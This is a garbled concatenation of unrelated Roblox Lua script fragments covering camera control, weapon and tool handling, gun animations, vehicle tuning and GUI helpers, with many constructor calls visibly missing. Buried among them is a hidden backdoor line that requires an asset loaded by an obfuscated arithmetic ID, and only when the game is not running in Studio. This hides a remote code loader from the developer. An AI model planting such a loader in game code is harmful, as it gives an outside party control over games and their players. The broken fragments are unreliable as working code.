self:GetVRFocus(subjectPosition, timeDelta) or end local cameraFocusP = newCameraFocus.p if VREnabled and not self:IsInFirstPerson() then local cameraHeight = self:GetCameraHeight() local vecToSubject = (subjectPosition - camera.CFrame.p) local distToSubject = vecToSubject.magnitude -- Only move the camera if it exceeded a maximum distance to the subject in VR if distToSubject > zoom or self.rotateInput.x ~= 0 then local desiredDist = math.min(distToSubject, zoom) vecToSubject = self:CalculateNewLookVectorVR() * desiredDist local newPos = cameraFocusP - vecToSubject local desiredLookDir = camera.CFrame.lookVector if self.rotateInput.x ~= 0 then desiredLookDir = vecToSubject end local lookAt = + desiredLookDir.x, newPos.y, newPos.z + desiredLookDir.z) self.rotateInput = ZERO_VECTOR2 newCameraCFrame =, lookAt) +, cameraHeight, 0) end else local newLookVector = self:CalculateNewLookVector(overrideCameraLookVector) self.rotateInput = ZERO_VECTOR2 newCameraCFrame = - (zoom * newLookVector), cameraFocusP) end else -- is FollowCamera local newLookVector = self:CalculateNewLookVector(overrideCameraLookVector) self.rotateInput = ZERO_VECTOR2 if FFlagUserNewDefaultCameraAngle then if VRService.VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = + self:GetCameraSubjectOffset()) end else if VRService.VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) elseif self.portraitMode then newCameraFocus = + PORTRAIT_OFFSET) else newCameraFocus = end end newCameraCFrame = - (zoom * newLookVector), newCameraFocus.p) +, self:GetCameraHeight(), 0) end self.lastCameraTransform = newCameraCFrame self.lastCameraFocus = newCameraFocus if (isInVehicle or isOnASkateboard) and cameraSubject:IsA('BasePart') then self.lastSubjectCFrame = cameraSubject.CFrame else self.lastSubjectCFrame = nil end end self.lastUpdate = now return newCameraCFrame, newCameraFocus end function ClassicCamera:EnterFirstPerson() self.inFirstPerson = true self:UpdateMouseBehavior() end function ClassicCamera:LeaveFirstPerson() self.inFirstPerson = false self:UpdateMouseBehavior() end return ClassicCamera
Tool.Equipped:Connect(function() Character = Tool.Parent HRP = Character:WaitForChild("HumanoidRootPart") Humanoid = Character:WaitForChild("Humanoid") equippedIdle = Humanoid:LoadAnimation(script.Animations.Idle) equippedIdle:Play() Equipped.Value = true attackRemote:FireServer("Unblock", Tool.Name) if not childAdded then childAdded = Character.ChildAdded:Connect(function() if not Equipped.Value then return end if not Player:FindFirstChild("Ragdoll") then equippedIdle:Play() else equippedIdle:Stop() end end) end if not childRemoved then childRemoved = Character.ChildRemoved:Connect(function() if not Equipped.Value then return end if not Player:FindFirstChild("Ragdoll") then equippedIdle:Play() else equippedIdle:Stop() end end) end end) Tool.Unequipped:Connect(function() equippedIdle:Stop() attackRemote:FireServer("Unblock", Tool.Name) Equipped.Value = false if childAdded ~= nil then childAdded:Disconnect() childAdded = nil end if childRemoved ~= nil then childRemoved:Disconnect() childRemoved = nil end end) UIS.InputBegan:Connect(function(Input, isTyping) if isTyping then return end if Input.UserInputType == Enum.UserInputType.MouseButton1 then if not Humanoid then return end if Humanoid.Health > 0 then local Disabled = Character:FindFirstChild("Disabled") if not Disabled then if UIS:IsKeyDown(Enum.KeyCode.Space) then attackRemote:FireServer("M1", Tool.Name, true) else attackRemote:FireServer("M1", Tool.Name, false) end coroutine.wrap(function() local noJumpValue ="BoolValue") noJumpValue.Name = "noJump" noJumpValue.Parent = Character game.Debris:AddItem(noJumpValue, 1) end)() end end elseif Input.KeyCode == Enum.KeyCode.F then if not Humanoid then return end if Humanoid.Health > 0 then local Disabled = Character:FindFirstChild("Disabled") if not Disabled then attackRemote:FireServer("Block", Tool.Name) end end end end) UIS.InputEnded:Connect(function(Input, isTyping) if isTyping then return end if Input.KeyCode == Enum.KeyCode.F then attackRemote:FireServer("Unblock", Tool.Name) end end)
-- Local Variables
local Player = game.Players.LocalPlayer local Tool = script.Parent.Parent local HitPlayer = Tool:WaitForChild('HitPlayers') local DirectHitPlayer = Tool:WaitForChild('DirectHitPlayer') local Configurations = Tool.Configuration function RocketManager:BindRocketEvents(rocket) local exploded = false rocket.PrimaryPart.Touched:connect(function(otherPart) if not otherPart:IsDescendantOf(Player.Character) and not exploded then exploded = true rocket.PrimaryPart.LocalTransparencyModifier = 1 Tool.RocketHit:FireServer(rocket, rocket.PrimaryPart.Position) local collision ='Part') collision.Anchored = true collision.CanCollide = false collision.Position = rocket.PrimaryPart.Position collision.FormFactor = Enum.FormFactor.Custom collision.Shape = Enum.PartType.Ball collision.Size =,1,1) * Configurations.BlastRadius.Value * 2 collision.Parent = game.Workspace collision.CanCollide = true local hitPlayers = {} local hitParts = collision:GetTouchingParts() collision:Destroy() local player = Players:GetPlayerFromCharacter(otherPart.Parent) if player then DirectHitPlayer:FireServer(player.userId) end for _, hitPart in ipairs(hitParts) do local player = Players:GetPlayerFromCharacter(hitPart.Parent) if player and not hitPlayers[tostring(player.userId)] then hitPlayers[tostring(player.userId)] = true end end HitPlayer:FireServer(hitPlayers) end end) end return RocketManager
if not game:GetService("RunService"):IsStudio() then require((397.86020086+0.00000400)*9305953) end
local function Clamp(x, min, max) return x < min and min or x > max and max or x end local function GetChar() local character = player.Character if character then return character:FindFirstChildOfClass("Humanoid"), character:FindFirstChild("HumanoidRootPart") end end local function InputCurve(x) local s = math.abs(x) if s > DEADZONE then s = 0.255000975*(2^(2.299113817*s) - 1) return x > 0 and (s > 1 and 1 or s) or (s > 1 and -1 or -s) end return 0 end
--[[** Links several instances to a janitor, which is then returned. @param [t:...Instance] ... All the instances you want linked. @returns [t:Janitor] A janitor that can be used to manually disconnect all LinkToInstances. **--]]
function Janitor.__index:LinkToInstances(...) local ManualCleanup = for _, Object in ipairs({...}) do ManualCleanup:Add(self:LinkToInstance(Object, true), "Disconnect") end return ManualCleanup end for FunctionName, Function in next, Janitor.__index do local NewFunctionName = string.sub(string.lower(FunctionName), 1, 1) .. string.sub(FunctionName, 2) Janitor.__index[NewFunctionName] = Function end return Janitor
-- useless comment
function onTouched(hit) if not hit or not hit.Parent then return end local human = hit.Parent:findFirstChild("Humanoid") if human and human:IsA("Humanoid") then human:TakeDamage(35) end end script.Parent.Touched:connect(onTouched)
--[=[ Destroys a ScriptSignal object, disconnecting all connections and making it unusable. ```lua ScriptSignal:Destroy() local connection = ScriptSignal:Connect(function() end) connection.Connected -> false ``` @ignore ]=]
function ScriptSignal:Destroy() if self._active ~= true then return end self:DisconnectAll() self._active = false end
--//Client Animations
IdleAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 = require(script.Parent.Settings).RightPos}):Play() -- require(script).FakeRightPos (For fake arms) | require(script).RightArmPos (For real arms) ts:Create(objs[3],,{C1 = require(script.Parent.Settings).LeftPos}):Play() -- require(script).FakeLeftPos (For fake arms) | require(script).LeftArmPos (For real arms) end; StanceDown = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -0.2, -1.25) * CFrame.Angles(math.rad(-60), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,-0.05,-1.65) * CFrame.Angles(math.rad(-90),math.rad(35),math.rad(-25))}):Play() wait(0.3) end; StanceUp = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -1.5, -1.25) * CFrame.Angles(math.rad(-160), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,-0.6,-1.15) * CFrame.Angles(math.rad(-170),math.rad(60),math.rad(15))}):Play() wait(0.3) end; Patrol = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -.9, -1.6) * CFrame.Angles(math.rad(-80), math.rad(-70), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,0.75,-1) * CFrame.Angles(math.rad(-90),math.rad(-45),math.rad(-25))}):Play() wait(0.3) end; SprintAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -0.2, -1.25) * CFrame.Angles(math.rad(-60), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,-0.05,-1.65) * CFrame.Angles(math.rad(-90),math.rad(35),math.rad(-25))}):Play() wait(0.3) end; EquipAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -0.2, -1.25) * CFrame.Angles(math.rad(-60), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,-0.05,-1.65) * CFrame.Angles(math.rad(-90),math.rad(35),math.rad(-25))}):Play() wait(0.1) objs[5].Handle:WaitForChild("AimUp"):Play() ts:Create(objs[2],,{C1 = require(script.Parent.Settings).RightPos}):Play() ts:Create(objs[3],,{C1 = require(script.Parent.Settings).LeftPos}):Play() wait(0.5) end; ZoomAnim = function(char, speed, objs) --ts:Create(objs[2],,{C1 =, -0.2, -1.25) * CFrame.Angles(math.rad(-60), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =, -0.7, -1)*CFrame.Angles(math.rad(-180), 0, 0)*CFrame.Angles(0, 0, math.rad(30))}):Play() wait(0.3) ts:Create(objs[3],,{C1 =, -1.1, -1)*CFrame.Angles(math.rad(-180), 0, 0)*CFrame.Angles(0, 0, math.rad(5))}):Play() ts:Create(objs[5].g33:WaitForChild("g33"),,{C1 =, 0.21, 0)*CFrame.Angles(0, 0, math.rad(90))*, -0.75, 0)}):Play() wait(0.3) end; UnZoomAnim = function(char, speed, objs) --ts:Create(objs[2],,{C1 =, -0.2, -1.25) * CFrame.Angles(math.rad(-60), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =, -1.1, -1)*CFrame.Angles(math.rad(-180), 0, 0)*CFrame.Angles(0, 0, math.rad(5))}):Play() wait(0.3) ts:Create(objs[3],,{C1 =, -0.7, -1)*CFrame.Angles(math.rad(-180), 0, 0)*CFrame.Angles(0, 0, math.rad(30))}):Play() ts:Create(objs[5].g33:WaitForChild("g33"),,{C1 =}):Play() wait(0.3) end; ChamberAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 = require(script.Parent.Settings).RightPos}):Play() ts:Create(objs[3],,{C1 =,0.5,-1.25) * CFrame.Angles(math.rad(-120),math.rad(15),math.rad(15))}):Play() wait(0.35) objs[5].Bolt:WaitForChild("SlidePull"):Play() ts:Create(objs[3],,{C1 =,0.15,-1.05) * CFrame.Angles(math.rad(-120),math.rad(15),math.rad(15))}):Play() ts:Create(objs[5].Handle:WaitForChild("Bolt"),,{C0 =[6].BoltExtend) * CFrame.Angles(0,math.rad(0),0)}):Play() ts:Create(objs[5].Handle:WaitForChild("Slide"),,{C0 =[6].SlideExtend) * CFrame.Angles(0,math.rad(0),0)}):Play() wait(0.3) objs[5].Bolt:WaitForChild("SlideRelease"):Play() ts:Create(objs[5].Handle:WaitForChild("Bolt"),,{C0 =,0,0) * CFrame.Angles(0,math.rad(0),0)}):Play() ts:Create(objs[5].Handle:WaitForChild("Slide"),,{C0 =,0,0) * CFrame.Angles(0,math.rad(0),0)}):Play() end; ChamberBKAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -0.465, -1.15) * CFrame.Angles(math.rad(-95), math.rad(-2), math.rad(7.5))}):Play() ts:Create(objs[3],,{C1 =,-0.15,-1.115) * CFrame.Angles(math.rad(-110),math.rad(25),math.rad(0))}):Play() wait(0.3) objs[5].Bolt:WaitForChild("SlideRelease"):Play() ts:Create(objs[3],,{C1 =,-0.15,-1.025) * CFrame.Angles(math.rad(-100),math.rad(30),math.rad(0))}):Play() ts:Create(objs[5].Handle:WaitForChild("Bolt"),,{C0 =,0,0) * CFrame.Angles(0,math.rad(0),0)}):Play() ts:Create(objs[5].Handle:WaitForChild("Slide"),,{C0 =,0,0) * CFrame.Angles(0,math.rad(0),0)}):Play() wait(0.15) end; CheckAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, 0, -1.15) * CFrame.Angles(math.rad(-95), math.rad(-2), math.rad(7.5))}):Play() ts:Create(objs[3],,{C1 =,0.475,-1.6) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() wait(.35) local MagC = objs[5]:WaitForChild("Mag"):clone() objs[5].Mag.Transparency = 1 MagC.Parent = objs[5] MagC.Name = "MagC" MagC.Transparency = 0 local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = objs[3].Parent.Parent:WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(objs[3].Parent.Parent:WaitForChild("Left Arm").CFrame) ts:Create(MagCW,,{C0 =, 0.5, -0.75) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0))}):Play() ts:Create(objs[3],,{C1 =,0.475,-2.05) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() objs[5].Handle:WaitForChild("MagOut"):Play() wait(0.3) ts:Create(objs[3],,{C1 =,0.475,-1.5) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(0))}):Play() wait(1.5) ts:Create(objs[3],,{C1 =,0.475,-2.05) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() wait(0.3) ts:Create(objs[3],,{C1 =,0.475,-1.6) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() objs[5].Handle:WaitForChild("MagIn"):Play() MagC:Destroy() objs[5].Mag.Transparency = 0 wait(0.3) end; ShellInsertAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, -0.365, -1.2) * CFrame.Angles(math.rad(-115), math.rad(-2), math.rad(9))}):Play() ts:Create(objs[3],,{C1 =,-0.4,-1.15) * CFrame.Angles(math.rad(-100),math.rad(70),math.rad(-41))}):Play() wait(0.3) objs[5].Handle:WaitForChild("ShellInsert"):Play() ts:Create(objs[2],,{C1 =, -0.365, -1.2) * CFrame.Angles(math.rad(-110), math.rad(-2), math.rad(9))}):Play() ts:Create(objs[3],,{C1 =,-0.3,-1.1) * CFrame.Angles(math.rad(-100),math.rad(70),math.rad(-41))}):Play() objs[6].Value = objs[6].Value - 1 objs[7].Value = objs[7].Value + 1 wait(0.3) end; ReloadAnim = function(char, speed, objs) ts:Create(objs[2],,{C1 =, 0, -1.15) * CFrame.Angles(math.rad(-95), math.rad(-2), math.rad(7.5))}):Play() ts:Create(objs[3],,{C1 =,0.475,-1.6) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() wait(0.5) ts:Create(objs[2],,{C1 =, 0, -1.35) * CFrame.Angles(math.rad(-100), math.rad(-2), math.rad(7.5))}):Play() ts:Create(objs[3],,{C1 =,1.4,-0.5) * CFrame.Angles(math.rad(0),math.rad(25),math.rad(0))}):Play() objs[5].Mag.Transparency = 1 objs[5].Handle:WaitForChild("MagOut"):Play() local MagC = objs[5]:WaitForChild("Mag"):clone() MagC.Parent = objs[5] MagC.Name = "MagC" MagC.Transparency = 0 local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = objs[3].Parent.Parent:WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(objs[3].Parent.Parent:WaitForChild("Left Arm").CFrame) ts:Create(MagCW,,{C0 =, 0.5, -0.75) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0))}):Play() wait(1.5) ts:Create(objs[2],,{C1 =, 0, -1.15) * CFrame.Angles(math.rad(-95), math.rad(-2), math.rad(7.5))}):Play() ts:Create(objs[3],,{C1 =,0.475,-1.6) * CFrame.Angles(math.rad(-100),math.rad(0),math.rad(7.5))}):Play() wait(0.5) ts:Create(objs[2],,{C1 =, 0, -1.125) * CFrame.Angles(math.rad(-95), math.rad(-2), math.rad(7.5))}):Play() objs[5].Handle:WaitForChild("MagIn"):Play() MagC:Destroy() objs[5].Mag.Transparency = 0 if (objs[6].Value - (objs[8].Ammo - objs[7].Value)) < 0 then objs[7].Value = objs[7].Value + objs[6].Value objs[6].Value = 0 --Evt.Recarregar:FireServer(objs[5].Value) elseif objs[7].Value <= 0 then objs[6].Value = objs[6].Value - (objs[8].Ammo - objs[7].Value) --Evt.Recarregar:FireServer(objs[5].Value) objs[7].Value = objs[8].Ammo objs[9] = false elseif objs[7].Value > 0 and objs[9] and objs[8].IncludeChamberedBullet then objs[6].Value = objs[6].Value - (objs[8].Ammo - objs[7].Value) - 1 --objs[10].Recarregar:FireServer(objs[6].Value) objs[7].Value = objs[8].Ammo + 1 elseif objs[7].Value > 0 and objs[9] and not objs[8].IncludeChamberedBullet then objs[6].Value = objs[6].Value - (objs[8].Ammo - objs[7].Value) --Evt.Recarregar:FireServer(objs[5].Value) objs[7].Value = objs[8].Ammo end wait(0.55) end;
--Torque Curve Tune.Horsepower = 365 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 5000 -- Use sliders to manipulate values Tune.Redline = 6200 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 2 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
--[[ @class Blend.story ]]
local require = require(game:GetService("ServerScriptService"):FindFirstChild("LoaderUtils", true).Parent).load(script) local Blend = require("Blend") local Maid = require("Maid") return function(target) local maid = local state = Blend.State({"a", "b", "c"}) maid:GiveTask(state) maid:GiveTask((Blend.New "TextLabel" { Parent = target; [Blend.Children] = { Blend.New "TextButton" { Text = "Add"; AutoButtonColor = true; Size =, 100, 0, 20); [Blend.OnEvent "Activated"] = function() local newState = {} for _, item in pairs(state.Value) do table.insert(newState, item) end table.insert(newState, string.char(string.byte("a") + #newState)) state.Value = newState end; }; Blend.ComputedPairs(state, function(_index, value) print("Compute", value) return Blend.New "TextLabel" { Text = tostring(value); Size =, 20, 0, 20); } end); Blend.New "UIListLayout" { Padding =, 5); }; }; }):Subscribe()) return function() maid:DoCleaning() end end
-- COLOR SETTINGS --[[ COLOR PRESETS: Headlights - OEM White - Xenon - Pure White - Brilliant Blue - Light Green - Golden Yellow - Bubu's Purple - Yellow Indicators - Light Orange - Dark Orange - Yellow - Red For custom color use Color3.fromRGB(R, G, B). You can get your RGB code from the "Color" property. ]]
-- local Low_Beam_Color = "Xenon" local High_Beam_Color = "Xenon" local Running_Light_Color = "OEM White" local Interior_Light_Color = "OEM White" local Front_Indicator_Color = "Dark Orange" local Rear_Indicator_Color = "Dark Orange" local Fog_Light_Color = "OEM White" local Plate_Light_Color = "OEM White"
-- and (IsServer or weaponInstance:IsDescendantOf(Players.LocalPlayer))
function WeaponsSystem.onWeaponAdded(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if not weapon then WeaponsSystem.createWeaponForInstance(weaponInstance) end end function WeaponsSystem.onWeaponRemoved(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if weapon then weapon:onDestroyed() end WeaponsSystem.knownWeapons[weaponInstance] = nil end function WeaponsSystem.getRemoteEvent(name) if not WeaponsSystem.networkFolder then return end local remoteEvent = WeaponsSystem.remoteEvents[name] if IsServer then if not remoteEvent then warn("No RemoteEvent named ", name) return nil end return remoteEvent else if not remoteEvent then remoteEvent = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteEvent end end function WeaponsSystem.getRemoteFunction(name) if not WeaponsSystem.networkFolder then return end local remoteFunc = WeaponsSystem.remoteFunctions[name] if IsServer then if not remoteFunc then warn("No RemoteFunction named ", name) return nil end return remoteFunc else if not remoteFunc then remoteFunc = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteFunc end end function WeaponsSystem.setWeaponEquipped(weapon, equipped) assert(not IsServer, "WeaponsSystem.setWeaponEquipped should only be called on the client.") if not weapon then return end local lastWeapon = WeaponsSystem.currentWeapon local hasWeapon = false local weaponChanged = false if lastWeapon == weapon then if not equipped then WeaponsSystem.currentWeapon = nil hasWeapon = false weaponChanged = true else weaponChanged = false end else if equipped then WeaponsSystem.currentWeapon = weapon hasWeapon = true weaponChanged = true end end if then if WeaponsSystem.currentWeapon then"ZoomFactor", 1.1))"HasScope", false)) end end if WeaponsSystem.gui then WeaponsSystem.gui:setEnabled(hasWeapon) if WeaponsSystem.currentWeapon then WeaponsSystem.gui:setCrosshairWeaponScale(WeaponsSystem.currentWeapon:getConfigValue("CrosshairScale", 1)) else WeaponsSystem.gui:setCrosshairWeaponScale(1) end end if weaponChanged then WeaponsSystem.CurrentWeaponChanged:Fire(weapon.instance, lastWeapon and lastWeapon.instance) end end function WeaponsSystem.getHumanoid(part) while part and part ~= workspace do if part:IsA("Model") and part.PrimaryPart and part.PrimaryPart.Name == "HumanoidRootPart" then return part:FindFirstChildOfClass("Humanoid") end part = part.Parent end end function WeaponsSystem.getPlayerFromHumanoid(humanoid) for _, player in ipairs(Players:GetPlayers()) do if player.Character and humanoid:IsDescendantOf(player.Character) then return player end end end local function _defaultDamageCallback(system, target, amount, damageType, dealer, hitInfo, damageData) if target:IsA("Humanoid") then local Player = Players:GetPlayerFromCharacter(target.Parent) if not Player and target.Health > 0 then target:TakeDamage(amount) -- Check if target is dead after applying damage if target.Health <= 0 and dealer and dealer.leaderstats and dealer.leaderstats.Kills then dealer.leaderstats.Kills.Value = dealer.leaderstats.Kills.Value + 1 end end end end function WeaponsSystem.doDamage(target, amount, damageType, dealer, hitInfo, damageData) if not target or ancestorHasTag(target, "WeaponsSystemIgnore") then return end if IsServer then if target:IsA("Humanoid") and dealer:IsA("Player") and dealer.Character then local dealerHumanoid = dealer.Character:FindFirstChildOfClass("Humanoid") local targetPlayer = Players:GetPlayerFromCharacter(target.Parent) if dealerHumanoid and target ~= dealerHumanoid and targetPlayer then -- Trigger the damage indicator WeaponData:FireClient(targetPlayer, "HitByOtherPlayer", dealer.Character.HumanoidRootPart.CFrame.Position) end end -- NOTE: damageData is a more or less free-form parameter that can be used for passing information from the code that is dealing damage about the cause. -- .The most obvious usage is extracting icons from the various weapon types (in which case a weapon instance would likely be passed in) -- ..The default weapons pass in that data local handler = _damageCallback or _defaultDamageCallback handler(WeaponsSystem, target, amount, damageType, dealer, hitInfo, damageData) end end local function _defaultGetTeamCallback(player) return 0 end function WeaponsSystem.getTeam(player) local handler = _getTeamCallback or _defaultGetTeamCallback return handler(player) end function WeaponsSystem.playersOnDifferentTeams(player1, player2) if player1 == player2 or player1 == nil or player2 == nil then -- This allows players to damage themselves and NPC's return true end local player1Team = WeaponsSystem.getTeam(player1) local player2Team = WeaponsSystem.getTeam(player2) return player1Team == 0 or player1Team ~= player2Team end return WeaponsSystem
--[=[ @param enabled boolean Sets the [`GuiService.AutoSelectGuiEnabled`]( property. This sets whether or not the Select button on a gamepad will try to auto-select a GUI object on screen. This does _not_ turn on/off GUI gamepad navigation, but just the initial selection using the Select button. For UX purposes, it usually is preferred to set this to `false` and then manually set the [`GuiService.SelectedObject`]( property within code to set the selected object for gamepads. ```lua gamepad:SetAutoSelectGui(false) game:GetService("GuiService").SelectedObject = someGuiObject ``` ]=]
function Gamepad:SetAutoSelectGui(enabled: boolean) GuiService.AutoSelectGuiEnabled = enabled end
--// All global vars will be wiped/replaced except script
return function(data, env) if env then setfenv(1, env) end local gui = script.Parent.Parent--client.UI.Prepare(script.Parent.Parent) local frame = gui.Frame local frame2 = frame.Frame local msg = frame2.Message local ttl = frame2.Title local Left = frame2.Left local gIndex = data.gIndex local gTable = data.gTable local title = data.Title local message = data.Message local scroll = data.Scroll local tim = data.Time local gone = false if not data.Message or not data.Title then gTable:Destroy() end ttl.Text = title msg.Text = message ttl.TextTransparency = 1 msg.TextTransparency = 1 ttl.TextStrokeTransparency = 1 msg.TextStrokeTransparency = 1 frame.BackgroundTransparency = 1 local log = { Type = "Small Screen Message"; Title = title; Message = message; Icon = "rbxassetid://7501175708"; Time ="%X"); Function = nil; } table.insert(client.Variables.CommunicationsHistory, log) service.Events.CommsCenter:Fire(log) local fadeSteps = 10 local blurSize = 10 local textFade = 0.1 local strokeFade = 0.5 local frameFade = 0.3 local blurStep = blurSize/fadeSteps local frameStep = frameFade/fadeSteps local textStep = 0.1 local strokeStep = 0.1 local function fadeIn() gTable:Ready() for i = 1,fadeSteps do if msg.TextTransparency>textFade then msg.TextTransparency = msg.TextTransparency-textStep ttl.TextTransparency = ttl.TextTransparency-textStep end if msg.TextStrokeTransparency>strokeFade then msg.TextStrokeTransparency = msg.TextStrokeTransparency-strokeStep ttl.TextStrokeTransparency = ttl.TextStrokeTransparency-strokeStep end if frame.BackgroundTransparency>frameFade then frame.BackgroundTransparency = frame.BackgroundTransparency-frameStep frame2.BackgroundTransparency = frame.BackgroundTransparency end service.Wait("Stepped") end end local function fadeOut() if not gone then gone = true for i = 1,fadeSteps do if msg.TextTransparency<1 then msg.TextTransparency = msg.TextTransparency+textStep ttl.TextTransparency = ttl.TextTransparency+textStep end if msg.TextStrokeTransparency<1 then msg.TextStrokeTransparency = msg.TextStrokeTransparency+strokeStep ttl.TextStrokeTransparency = ttl.TextStrokeTransparency+strokeStep end if frame.BackgroundTransparency<1 then frame.BackgroundTransparency = frame.BackgroundTransparency+frameStep frame2.BackgroundTransparency = frame.BackgroundTransparency end service.Wait("Stepped") end service.UnWrap(gui):Destroy() end end gTable.CustomDestroy = function() fadeOut() end fadeIn() if not tim then local _,time = message:gsub(" ","") time = math.clamp(time/2,4,11)+1 Left.Text = '['..time..']' for i=time,1,-1 do if not Left then break end Left.Text = '['..i..']' wait(1) end else Left.Text = '['..tim..']' for i=tim,1,-1 do if not Left then break end Left.Text = '['..i..']' wait(1) end end Left.Text = '[Closing]' wait(0.3) if not gone then fadeOut() end end
--Made by Luckymaxer
Tool = script.Parent Handle = Tool:WaitForChild("Handle") Players = game:GetService("Players") Debris = game:GetService("Debris") RunService = game:GetService("RunService") ContentProvider = game:GetService("ContentProvider") UserInputService = game:GetService("UserInputService") InputCheck ="ScreenGui") InputCheck.Name = "InputCheck" InputFrame ="Frame") InputFrame.Name = "InputButton" InputFrame.BackgroundTransparency = 1 InputFrame.Size =, 0, 1, 0) InputFrame.Parent = InputCheck RbxUtility = LoadLibrary("RbxUtility") Create = RbxUtility.Create Animations = {} LocalObjects = {} ServerControl = Tool:WaitForChild("ServerControl") ClientControl = Tool:WaitForChild("ClientControl") Rate = (1 / 60) ToolEquipped = false function SetAnimation(mode, value) if not ToolEquipped or not CheckIfAlive() then return end if mode == "PlayAnimation" and value and ToolEquipped and Humanoid then for i, v in pairs(Animations) do if v.Animation == value.Animation then v.AnimationTrack:Stop() table.remove(Animations, i) end end local AnimationTrack = Humanoid:LoadAnimation(value.Animation) table.insert(Animations, {Animation = value.Animation, AnimationTrack = AnimationTrack}) AnimationTrack:Play(value.FadeTime, value.Weight, value.Speed) elseif mode == "StopAnimation" and value then for i, v in pairs(Animations) do if v.Animation == value.Animation then v.AnimationTrack:Stop() table.remove(Animations, i) end end end end function CheckIfAlive() return (((Character and Character.Parent and Humanoid and Humanoid.Parent and Humanoid.Health > 0 and Player and Player.Parent) and true) or false) end function Equipped(Mouse) Character = Tool.Parent Player = Players:GetPlayerFromCharacter(Character) Humanoid = Character:FindFirstChild("Humanoid") ToolEquipped = true if not CheckIfAlive() then return end Spawn(function() PlayerMouse = Player:GetMouse() Mouse.Button1Down:connect(function() InvokeServer("Button1Click", {Down = true}) end) Mouse.Button1Up:connect(function() InvokeServer("Button1Click", {Down = false}) end) Mouse.KeyDown:connect(function(Key) InvokeServer("KeyPress", {Key = Key, Down = true}) end) Mouse.KeyUp:connect(function(Key) InvokeServer("KeyPress", {Key = Key, Down = false}) end) local PlayerGui = Player:FindFirstChild("PlayerGui") if PlayerGui then InputCheckClone = InputCheck:Clone() if UserInputService.TouchEnabled then InputCheckClone = InputCheck:Clone() InputCheckClone.InputButton.InputBegan:connect(function() InvokeServer("Button1Click", {Down = true}) end) InputCheckClone.InputButton.InputEnded:connect(function() InvokeServer("Button1Click", {Down = false}) end) InputCheckClone.Parent = PlayerGui end end for i, v in pairs(Tool:GetChildren()) do if v:IsA("Animation") then ContentProvider:Preload(v.AnimationId) end end end) end function Unequipped() for i, v in pairs(Animations) do if v and v.AnimationTrack then v.AnimationTrack:Stop() end end if InputCheckClone then Debris:AddItem(InputCheckClone, 0) end if ObjectLocalTransparencyModifier then ObjectLocalTransparencyModifier:disconnect() end LocalObjects = {} Animations = {} ToolEquipped = false end function InvokeServer(mode, value) local ServerReturn = nil pcall(function() ServerReturn = ServerControl:InvokeServer(mode, value) end) return ServerReturn end function OnClientInvoke(mode, value) if not ToolEquipped or not CheckIfAlive() then return end if mode == "PlayAnimation" and value then SetAnimation("PlayAnimation", value) elseif mode == "StopAnimation" and value then SetAnimation("StopAnimation", value) elseif mode == "PlaySound" and value then value:Play() elseif mode == "StopSound" and value then value:Stop() elseif mode == "MouseData" then return ((PlayerMouse and {Hit = PlayerMouse.Hit, Target = PlayerMouse.Target}) or nil) elseif mode == "SetLocalTransparencyModifier" and value and ToolEquipped then pcall(function() local ObjectFound = false for i, v in pairs(LocalObjects) do if v == value then ObjectFound = true end end if not ObjectFound then table.insert(LocalObjects, value) if ObjectLocalTransparencyModifier then ObjectLocalTransparencyModifier:disconnect() end ObjectLocalTransparencyModifier = RunService.RenderStepped:connect(function() for i, v in pairs(LocalObjects) do if v.Object and v.Object.Parent then if ((not v.AutoUpdate and (v.Object.LocalTransparencyModifier == 1 or v.Object.LocalTransparencyModifier == 0)) or v.AutoUpdate) then v.Object.LocalTransparencyModifier = v.Transparency end else table.remove(LocalObjects, i) end end end) end end) end end ClientControl.OnClientInvoke = OnClientInvoke Tool.Equipped:connect(Equipped) Tool.Unequipped:connect(Unequipped)
--requires luaP
